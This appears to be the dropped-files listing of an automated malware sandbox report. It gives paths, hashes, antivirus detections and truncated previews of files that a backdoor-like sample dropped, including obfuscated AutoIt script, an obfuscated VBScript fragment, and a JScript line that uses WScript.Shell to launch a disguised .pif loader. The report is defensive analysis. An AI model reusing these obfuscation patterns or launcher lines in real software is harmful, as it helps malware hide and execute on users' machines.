                                                                                                                                                  Preview:Func CryChambers($EXPENSECARRYING)..$experiencesboulderpara = 588..$WellingtonNelsonDisks = 93..While 927..If $experiencesboulderpara = 586 Then..$AccordanceProceedingsFatIntend = 'restorationgrastaobservedrecipientusesmentordozenclosedelectricitysynopsistransmitted'..ObjGet(restorationml("76U81U79U77U91U92U51U80U93U90U92U51U85U81U86U51",56/7))..$CarriedReform = 'PATMORTGAGESCOCKSGENETICSBOBBYNATURALBROWSERFACTMOTHERBOARDCAFELADDERINFLUENCED'..IsDeclared(restorationml("85U70U68U73U79U74U82U86U70U84U65",5/5))..$brochurewelsh = 'onsrepositorydiscussionsromance'..Ceiling(3634)..$AttributesProjectedRetrieved = 'BOUGHTNEIGHBORSSHAMECONSTRAINTSMAMBOCOMMEUROLAYOUTATTORNEYS'..Chr(6319)..$experiencesboulderpara = $experiencesboulderpara + 1..EndIf..If $experiencesboulderpara = 587 Then..$atmosphericfeweralbany = 'DANNYNUDEEXTERIORRESIDENCEMEDICATIONDFGARLICHOSPITALITYPERFORMINGDEALTIMESPEAKINGDISCRIMINATIONCUSTOMSTAGGED'..IsDeclared(restorationml("78U104U108U94U82U101U115U112U111U110U115U105U98
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif
                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):189
                                                                                                                                                  Entropy (8bit):4.703486562755669
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:RiMIpGXfeNH5E5wWAX+aJp6/h4EkD5r1XPuRLjNe+KJKOaDZc5uWAX+aJp6/h4Ei:RiJbNHCwWDaJ0/hJkD1dPuNjN3xOaDZf
                                                                                                                                                  MD5:3E4E334322172D5B27D8E78430CB385D
                                                                                                                                                  SHA1:7C35364C19D0513FD4EE7CB340BFD366828E7D61
                                                                                                                                                  SHA-256:24A6DBC9AB9DBDBD44E20E2433A681CF9970D087C4F00659EB60E6396FBF06EA
                                                                                                                                                  SHA-512:EDD965198E30A35A5FB8D40FB2FFA34FD43C2F457B80391372E485AF76B665B2FF22B01D997120530E3DFC3F0BFF03F940B76711099A63286A7D2543A712CFF3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:new ActiveXObject("Wscript.Shell").Run("\"C:\\Users\\user\\AppData\\Local\\NeuraConnect Technologies\\NeuraLink.pif\" \"C:\\Users\\user\\AppData\\Local\\NeuraConnect Technologies\\B\"")
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):946784
                                                                                                                                                  Entropy (8bit):6.628560786473655
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:LOo8pEnK4mrqlEZuVZ2HOI+X0l1lMZyYFaeBmyF:LF8p4KpqlEZeXI+X0TVcae3F
                                                                                                                                                  MD5:848164D084384C49937F99D5B894253E
                                                                                                                                                  SHA1:3055EF803EEEC4F175EBF120F94125717EE12444
                                                                                                                                                  SHA-256:F58D3A4B2F3F7F10815C24586FAE91964EEED830369E7E0701B43895B0CEFBD3
                                                                                                                                                  SHA-512:AABE1CF076F48F32542F49A92E4CA9F054B31D5A9949119991B897B9489FE775D8009896408BA49AC43EC431C87C0D385DAEAD9DBBDE7EF6309B0C97BBAF852A
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                  • Antivirus: Virustotal, Detection: 4%, Browse
                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                  • Filename: SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: ClassroomEc.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: setup.lnk, Detection: malicious, Browse
                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: SecuriteInfo.com.Win32.BackdoorX-gen.25314.22004.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: oX9j1y0RV5.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: p2xoB50aKi.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: iZ7kyxHDY2.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L......`.........."...............................@.................................!Z....@...@.......@.....................T...|....P..h............L..`&...0..,v...........................C..........@............................................text............................... ..`.rdata..r...........................@..@.data...|p.......H..................@....rsrc...h....P......................@..@.reloc..,v...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):946784
                                                                                                                                                  Entropy (8bit):6.628560786473655
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:LOo8pEnK4mrqlEZuVZ2HOI+X0l1lMZyYFaeBmyF:LF8p4KpqlEZeXI+X0TVcae3F
                                                                                                                                                  MD5:848164D084384C49937F99D5B894253E
                                                                                                                                                  SHA1:3055EF803EEEC4F175EBF120F94125717EE12444
                                                                                                                                                  SHA-256:F58D3A4B2F3F7F10815C24586FAE91964EEED830369E7E0701B43895B0CEFBD3
                                                                                                                                                  SHA-512:AABE1CF076F48F32542F49A92E4CA9F054B31D5A9949119991B897B9489FE775D8009896408BA49AC43EC431C87C0D385DAEAD9DBBDE7EF6309B0C97BBAF852A
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                  • Antivirus: Virustotal, Detection: 4%, Browse
                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                  • Filename: SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: ClassroomEc.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: setup.lnk, Detection: malicious, Browse
                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: SecuriteInfo.com.Win32.BackdoorX-gen.25314.22004.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: oX9j1y0RV5.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: p2xoB50aKi.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: iZ7kyxHDY2.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L......`.........."...............................@.................................!Z....@...@.......@.....................T...|....P..h............L..`&...0..,v...........................C..........@............................................text............................... ..`.rdata..r...........................@..@.data...|p.......H..................@....rsrc...h....P......................@..@.reloc..,v...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  File Type:ASCII text, with very long lines (2633), with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1213985
                                                                                                                                                  Entropy (8bit):5.424802222912315
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:A96a/UwPRU7iuldXPKzUq0T1Ozd5Ux9BHtV7NdJK8crvosLhjNh4PfAv:pa/UwPRUvldXil01OAJHX/JK1LhB
                                                                                                                                                  MD5:2755A48352BA322E4FB289CC432C2882
                                                                                                                                                  SHA1:4F88077F28D532C45CFEC6A8320BCA36FCEBB773
                                                                                                                                                  SHA-256:6718CA85EE272C4251160CB301D3D5C17A78864EB8DB7100F418A72D053F7A4B
                                                                                                                                                  SHA-512:2D04052FA6582C48F17247A27E227253E4F8669421A1A1C086D4AAE267647B0402F8976C238E7390A9DBE42F15481E4714F3D34F88A9F00A5D77F096FA747737
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:Func CryChambers($EXPENSECARRYING)..$experiencesboulderpara = 588..$WellingtonNelsonDisks = 93..While 927..If $experiencesboulderpara = 586 Then..$AccordanceProceedingsFatIntend = 'restorationgrastaobservedrecipientusesmentordozenclosedelectricitysynopsistransmitted'..ObjGet(restorationml("76U81U79U77U91U92U51U80U93U90U92U51U85U81U86U51",56/7))..$CarriedReform = 'PATMORTGAGESCOCKSGENETICSBOBBYNATURALBROWSERFACTMOTHERBOARDCAFELADDERINFLUENCED'..IsDeclared(restorationml("85U70U68U73U79U74U82U86U70U84U65",5/5))..$brochurewelsh = 'onsrepositorydiscussionsromance'..Ceiling(3634)..$AttributesProjectedRetrieved = 'BOUGHTNEIGHBORSSHAMECONSTRAINTSMAMBOCOMMEUROLAYOUTATTORNEYS'..Chr(6319)..$experiencesboulderpara = $experiencesboulderpara + 1..EndIf..If $experiencesboulderpara = 587 Then..$atmosphericfeweralbany = 'DANNYNUDEEXTERIORRESIDENCEMEDICATIONDFGARLICHOSPITALITYPERFORMINGDEALTIMESPEAKINGDISCRIMINATIONCUSTOMSTAGGED'..IsDeclared(restorationml("78U104U108U94U82U101U115U112U111U110U115U105U98
                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\ClassroomEc.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):264192
                                                                                                                                                  Entropy (8bit):6.281778420980018
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:uHFq9O0lHPOGUWLhxjRYmFqZvEAOz04pmdV:w0lHPOGNnlMZce4wdV
                                                                                                                                                  MD5:02785C43A2C040A23250A393BD31F65E
                                                                                                                                                  SHA1:DD1EAC34B995DB3E9042AD3C4CC976A1B269694A
                                                                                                                                                  SHA-256:C5F80C51A6BFC433A4CDA5F1F786F96156E4E8ECE8C6D09FAF147C38E6C363EC
                                                                                                                                                  SHA-512:D492C28CEBA9BADF6A1CC89CFBF65EE256606B20890C1536B03832BCC72724DE97B179CFC97F39D9482CB2E24D966610CA8A082CBFE4E76B0D9792BFDF6EC113
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:..@8.P......G....x..u..8..3..x.....u.....3......M..........h..I.....I.....tBhd.L.V....I...t2...U.R.1j...h......`...P.u.....I..M...`...P......,...H..|....D..t..@8.@......|....D..t..@8.@..........V....I.........u}............M.Qh....j.W.P.....~....M.....s......U.RQ.P..u..}..E..u..P......QLj(..l...P.E.P..`.I..M...l...P......E...P.Q..O....e...M..Qh..J.W....x..u.M.QV...P.....V.Q..u...f.}...........M.Qh....j.W.P............M...........3.G;.u.3.RRR.U.R.....u(3.U.SSRSj.Q.P0.u..M..}....u...@.I..y....U.R.U.RQ.PH..t$.E.P...Q....H..|....D..t..@8.x..g....E......uR.U.RP.Q..M..E.P.q...A.P..A.PQ..d.I..M....u.Q...R0.........u..M.......u...@.I.......U.R.u.P.Q..}.........E.P...Q..e..3..E.........u.........E..U.!u.RW..P.Q..}.........E..U.RWP...Q..E.U.RP...Q..U.R..B0.E.E.P...QL.M..3.U.9U.vU.E.U.R.U.R..P.Q ..u4.E..U.R.u..P.Q8.E..U.Rj.P...QH.E.;E.E.P.........Q..U.B.U.;U.r..E.P...Q.G;}...8....u...t...........}.........E..U.RP...Q..u.}..E..u..P......QLj(..l...P.E.P..`.I...te.E...u+.M...l...P.y.
                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\ClassroomEc.exe
                                                                                                                                                  File Type:ASCII text, with very long lines (1642), with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):11538
                                                                                                                                                  Entropy (8bit):5.808106027541853
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:jwOy153hQUYdlwu3E9BvBb71OlMEVqjveQ6/lMjcEUo/arUuNOcS:cO4c/wNtYNXU
                                                                                                                                                  MD5:1DBF38EAFA3409FD5304C40E59660BE9
                                                                                                                                                  SHA1:E1DF1976D92E2F15CDF870291BEA8BAAEAD29304
                                                                                                                                                  SHA-256:BDCEEFF01EBC601F183853AD92513F3D4FB25C21469EE7E9298408FE94EE258E
                                                                                                                                                  SHA-512:D4F8BB33AAB8729954F5A87B5A884E48237E6A94A396CA323F874FAB9FC9D859ED15B29823F28C1B270259BC078421E33D0F6ACAAC3F734AE134C45296879F41
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:Set CtYziAfyYJECwiwJNHeWttrRoCnEzBwTYapjVECu=z..CXdpbIgdunTacnqilFwLLvH=EJXOOoyWzxCyAZtPfrxDZGWL..NxXtRYydFFOKmB=zXYwVVGlAkcHwtLYMjDqNiRCcvPVx..yPCvlwHVPdulvTcs=jUHwnWBlkuc..muLQluFyFUJdRvjTDKYura=wMgGTqkYVkgdlczjMPjns..sleJHGAogCuDKr=AMtzVOtCyebpnksRUkPctElzEbMW..lHLddjriycvjHWGpbeXXLksU=RVCKOnwiQVcMToYgJPPzpb..DlicPZqYfRIndAbdXcyQqkb=TYJwvCBnxhYAHejiPWyUl..INjnRXrGHsNEBRfZBNdlteB=JVpXqryCalfVOYKDxNGHNeAxRQca..Set ZEFkdPWOyFDjlksBxkDrNPsvUpGxOylINXzFKKnoN=t..iecCRoTbFRfRphp=ipBqqcVnhSLRJMcf..BpxmGOkUHFRbupaAzsZkOgMiWfZbe=SvZTIrPQAxdyaPrwuIzdfcctl..bhDdOOSTNcnhAg=DQEVIVWrVodrLnbqVIvFBhpF..hmeICTotEMEQoBdBlIon=uxfxDErJpfGZzxvTxafiZuMS..MiytsEwiQuyMg=ftccvXROuTHPdTdLZHblQbYERLFSD..suyzZrELfUaXqkb=goRyibfroSuQDLaZkTCA..XThihaCSTvMifvvqbuUReli=NoECzLiJWSsfDYTtNlfcxJhgVYNM..JHMLdzyOZmifelbyibmhPr=UMBtUfHxYxwhlEDjENdNLousnQ..NBgmSFPSZPfln=tpUwXjBElUmmduLFl..Set tuTTJVpIcLDbfDRcGZkdBDHoszqagJuzEJuankmZRg=e..wMEWHVmMxTrAnKCfVQzLEpSGb=WcmjmjMSiEPtLzlxZLF..UOJptqVylRTYmoZrjoxQOF=XARyZBlliqREoMdo
                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  File Type:ASCII text, with very long lines (1642), with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):11538
                                                                                                                                                  Entropy (8bit):5.808106027541853
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:jwOy153hQUYdlwu3E9BvBb71OlMEVqjveQ6/lMjcEUo/arUuNOcS:cO4c/wNtYNXU
                                                                                                                                                  MD5:1DBF38EAFA3409FD5304C40E59660BE9
                                                                                                                                                  SHA1:E1DF1976D92E2F15CDF870291BEA8BAAEAD29304
                                                                                                                                                  SHA-256:BDCEEFF01EBC601F183853AD92513F3D4FB25C21469EE7E9298408FE94EE258E
                                                                                                                                                  SHA-512:D4F8BB33AAB8729954F5A87B5A884E48237E6A94A396CA323F874FAB9FC9D859ED15B29823F28C1B270259BC078421E33D0F6ACAAC3F734AE134C45296879F41
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:Set CtYziAfyYJECwiwJNHeWttrRoCnEzBwTYapjVECu=z..CXdpbIgdunTacnqilFwLLvH=EJXOOoyWzxCyAZtPfrxDZGWL..NxXtRYydFFOKmB=zXYwVVGlAkcHwtLYMjDqNiRCcvPVx..yPCvlwHVPdulvTcs=jUHwnWBlkuc..muLQluFyFUJdRvjTDKYura=wMgGTqkYVkgdlczjMPjns..sleJHGAogCuDKr=AMtzVOtCyebpnksRUkPctElzEbMW..lHLddjriycvjHWGpbeXXLksU=RVCKOnwiQVcMToYgJPPzpb..DlicPZqYfRIndAbdXcyQqkb=TYJwvCBnxhYAHejiPWyUl..INjnRXrGHsNEBRfZBNdlteB=JVpXqryCalfVOYKDxNGHNeAxRQca..Set ZEFkdPWOyFDjlksBxkDrNPsvUpGxOylINXzFKKnoN=t..iecCRoTbFRfRphp=ipBqqcVnhSLRJMcf..BpxmGOkUHFRbupaAzsZkOgMiWfZbe=SvZTIrPQAxdyaPrwuIzdfcctl..bhDdOOSTNcnhAg=DQEVIVWrVodrLnbqVIvFBhpF..hmeICTotEMEQoBdBlIon=uxfxDErJpfGZzxvTxafiZuMS..MiytsEwiQuyMg=ftccvXROuTHPdTdLZHblQbYERLFSD..suyzZrELfUaXqkb=goRyibfroSuQDLaZkTCA..XThihaCSTvMifvvqbuUReli=NoECzLiJWSsfDYTtNlfcxJhgVYNM..JHMLdzyOZmifelbyibmhPr=UMBtUfHxYxwhlEDjENdNLousnQ..NBgmSFPSZPfln=tpUwXjBElUmmduLFl..Set tuTTJVpIcLDbfDRcGZkdBDHoszqagJuzEJuankmZRg=e..wMEWHVmMxTrAnKCfVQzLEpSGb=WcmjmjMSiEPtLzlxZLF..UOJptqVylRTYmoZrjoxQOF=XARyZBlliqREoMdo
                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\ClassroomEc.exe
                                                                                                                                                  File Type:ASCII text, with very long lines (2633), with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1213985
                                                                                                                                                  Entropy (8bit):5.424802222912315
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:A96a/UwPRU7iuldXPKzUq0T1Ozd5Ux9BHtV7NdJK8crvosLhjNh4PfAv:pa/UwPRUvldXil01OAJHX/JK1LhB
                                                                                                                                                  MD5:2755A48352BA322E4FB289CC432C2882
                                                                                                                                                  SHA1:4F88077F28D532C45CFEC6A8320BCA36FCEBB773
                                                                                                                                                  SHA-256:6718CA85EE272C4251160CB301D3D5C17A78864EB8DB7100F418A72D053F7A4B
                                                                                                                                                  SHA-512:2D04052FA6582C48F17247A27E227253E4F8669421A1A1C086D4AAE267647B0402F8976C238E7390A9DBE42F15481E4714F3D34F88A9F00A5D77F096FA747737
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:Func CryChambers($EXPENSECARRYING)..$experiencesboulderpara = 588..$WellingtonNelsonDisks = 93..While 927..If $experiencesboulderpara = 586 Then..$AccordanceProceedingsFatIntend = 'restorationgrastaobservedrecipientusesmentordozenclosedelectricitysynopsistransmitted'..ObjGet(restorationml("76U81U79U77U91U92U51U80U93U90U92U51U85U81U86U51",56/7))..$CarriedReform = 'PATMORTGAGESCOCKSGENETICSBOBBYNATURALBROWSERFACTMOTHERBOARDCAFELADDERINFLUENCED'..IsDeclared(restorationml("85U70U68U73U79U74U82U86U70U84U65",5/5))..$brochurewelsh = 'onsrepositorydiscussionsromance'..Ceiling(3634)..$AttributesProjectedRetrieved = 'BOUGHTNEIGHBORSSHAMECONSTRAINTSMAMBOCOMMEUROLAYOUTATTORNEYS'..Chr(6319)..$experiencesboulderpara = $experiencesboulderpara + 1..EndIf..If $experiencesboulderpara = 587 Then..$atmosphericfeweralbany = 'DANNYNUDEEXTERIORRESIDENCEMEDICATIONDFGARLICHOSPITALITYPERFORMINGDEALTIMESPEAKINGDISCRIMINATIONCUSTOMSTAGGED'..IsDeclared(restorationml("78U104U108U94U82U101U115U112U111U110U115U105U98
                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\ClassroomEc.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):284672
                                                                                                                                                  Entropy (8bit):6.7111298454087125
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:nwU0Wyw3mFygyE4mqd12lqlEAehuqN8zwNzlmhPL1b5nZ2tZ6lfA6d:nr0Wyw20K4mqClqlEZuB1b5Z2tZ6Xd
                                                                                                                                                  MD5:EAD6F8DB6759E6E9E2F4B7708A96AC92
                                                                                                                                                  SHA1:FFB1D6010A38D57F8B77C0CD0085FFA790C8AEDE
                                                                                                                                                  SHA-256:87FBFECD918F36439ED5D682B4A221E15BE4612CDD02FD7E565946650968B908
                                                                                                                                                  SHA-512:1693E94F7189097BE1EE1D42AB88402D12247E7B76BDCD842ADFD22C70A25AAEC4A82A715B82D4D8DC5BED43185CFD228D3C0E2A60CA51D787ED4F5F3425FF8B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.M.W..<.I.....M.......u._..^.U..QSVW.}............M..0.E...t...........}.....J.h....j.S..p.I.....uP..0.I...Wu5j.ht.J.S..........t!j.h..J.S.........t.VVS..p.I.....3...u..M.........M......t.V....I...u....;}...V...3._^[.....U..E.W.<...M.......L.....3.....u.3..D..t....<V.u..u......YY..t..u.P....I.....t.V.5...Y......j..'...Y..3.^_].U..Vh..J.h..J.h..J.j..w..........t..u.......I...^].^].%..I.U..Vh..J.h..J.h..J.j..<.........u...t.......I.........I.^].U..Vh..J.h..J.h..J.j............u...t.......I.........I.^].U..Vh..J.h..J.h..J.j............u..u...t.......I.........I.^].U..Vh..J.h..J.h..J.j............t..u....u..u.....I......u..u...8.I.^]...M....M.3.;.V.5..L........B.0.@.;.u.^.U..}..u'V...M..>.t..>.t..6....I..&........M.u.^]................SVW.T$..D$..L$.URPQQh.;B.d.5.......L.3.D$.d.%.....D$0.X..L$,3..p....t;.T$4...t.;.v..4v.\.....H..{..u.h.....C...........C......d........._^[.L$..A..........t3.D$..H.3..<...U.h..p..p..p..>......].D$..T$..........U.t$.........L$..).q..q..q(....
                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\ClassroomEc.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):142944
                                                                                                                                                  Entropy (8bit):5.969459394945841
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:b6jKj+wsxjgarB3RZgDWy4ZNogXJ3i2Umb2Oq:b64EgarxUaBZ2myoG
                                                                                                                                                  MD5:6B960EF62185ED62F077876EADCC43BA
                                                                                                                                                  SHA1:43145A1CAD268EB3A9E83976220C1FEF520C9178
                                                                                                                                                  SHA-256:AFA04BC5E7565DC55796122C222B1BF313A9EACCEE9950C47A7E3B0FE1E3E81A
                                                                                                                                                  SHA-512:99F644DF6343D6C875F772C3131191BB9DBB43E7A4C8D8541CD6BAFAEA7E4BDA1C92CE598B3795779F426B055F87631331489620B6BDF454C4820A374D7A7069
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.................*.+.,.-......7.8.9.:......D.E.F.G......Q.R.S.T......^._.`.a......j.k.l.m...........................@...................`........................... ................... ...........@....................................................................... ...............................................................................................................................................\.P.{.N.d.}.....\.P.{.X.p.s.}...\.p.{.X.p.s.}.......................................................................................................................alpha.lower.upper.alnum.ascii.blank.cntrl.digit.graph.print.punct.space.word.xdigit.\.P.{.X.w.d.}...\.p.{.N.d.}.....................\.h.....\.P.{.L.}...\.p.{.L.}................MARK.ACCEPT.COMMIT.F.FAIL.PRUNE.SKIP.THEN..\.P.{.L.l.}...............................M.....=.%...N.+...f.5...\.;.....C.....L...].S.....[.....d.....j.....l.........B.....g................._.....C.........................................>...........
                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\ClassroomEc.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):112640
                                                                                                                                                  Entropy (8bit):6.611164856526023
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:Ufza6iyY5tVGvH7fsUQwHJJX4xF5jtHk5B+LNBI:Ufm608DsvqJX4xNAB+g
                                                                                                                                                  MD5:34BF8C86E3DBF86DCB7757C149E9F093
                                                                                                                                                  SHA1:073875E0FF5BF3F02E4A7364771D285D4278B099
                                                                                                                                                  SHA-256:B6D1D4992A081AC54315204C8F8E0A269582D0C8D58A05ECAE9A1FBEC9427358
                                                                                                                                                  SHA-512:A3F157D609E776E3A2D9F5D50CFA699B89508F58ABA0775428C941067881FAC3E74FD8BF54D66368E8A83D841FC6184D9B682568496CD471ABDE45C44DFFC30A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.v.....j.Xf.E...S.Nq..Y..E.P..p.I....v......._^..[....U..Vj...q.....E.Yf.8.u..H....H...t...Q.P....&...^]...U..E.SVW.X.S..`.I........;.~...AQ..p..Y...O.3.PPQVj.SPP....I._..^[]...U..QQVj..p...U...j..E.P.J..M..J.V.M.........^....U..VWj..hp..Y..W..l.I..u.VW....I...y..f...f...._^]...U..E.SVW.X.S..`.I.......;.~...3.@j.Z.........Q..p....Y..t.SW....I.3.f..w.._^[]...U..S.].V.u.W.}.S...W.E.....I...xWf...tLf.}..j.Yr.f...w......f;.t2f;.u.j..w......Vj.WW..D.I.j...Xf9.u.j..w........x.3.@..3._^[]...U..SVW.}.j....[f;.......j.ZjHYj.^f;.v.f;.vnf;.ti.]..u.SV..8.I...ypf...uj.{.V.....E...M...p.I.j.Xf;.t#j.Yf;.v.j.Yf;.v.jHYf;.t..E.f...G..%f...E.PW.......u.V..p.I.W.u.f...W....F._^[]...U...(S.] VW.}.f.?$..O....E.P..l.I..G..U.3.RV.u.u..VP.Q(.u.u..................G..U.3.WR..WWP.Q,.........}...@...E...E f..t/.u.j....X..f..R..p.I...f....f...E .@..D.......@.3.A+....E.E .@..E.3..E..........N.j..M..M.^.}......R....E ..p.I.....M....f.4......E.9E.u..u.!..E PQ.}..........E ...E..}..M.f.4P........
                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\ClassroomEc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):142336
                                                                                                                                                  Entropy (8bit):6.406248037321785
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:pPpU08BjlWTPJth26X7Sn4UfpLUNN9t68cCWlrss4M5i9:LQBk7JjX74cN0lrzt4
                                                                                                                                                  MD5:FD88002B2C4106D99DB3171C2F55B007
                                                                                                                                                  SHA1:9E4FDC1C725805000ECDA278E02AE39B7C04E12E
                                                                                                                                                  SHA-256:64E46C6062D2165105A22E023A92BD2F20C3751A6CE3CEE6053FBB33C9E05D40
                                                                                                                                                  SHA-512:CBB8A2110FBDA84322D92FB15D6473333AD4DF43B780A0E76443509755291121893DF1A6F2B67E3C80AECBB6F5B6586B217CE8EEC5EDD3F4B92FEAD9298376FC
                                                                                                                                                  Malicious:false
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                  • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L......`.........."...............................@.................................!Z....@...@.......@.....................T...|....P..h............L..`&...0..,v...........................C..........@............................................text............................... ..`.rdata..r...........................@..@.data...|p.......H..................@....rsrc...h....P......................@..@.reloc..,v...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):60
                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):60
                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
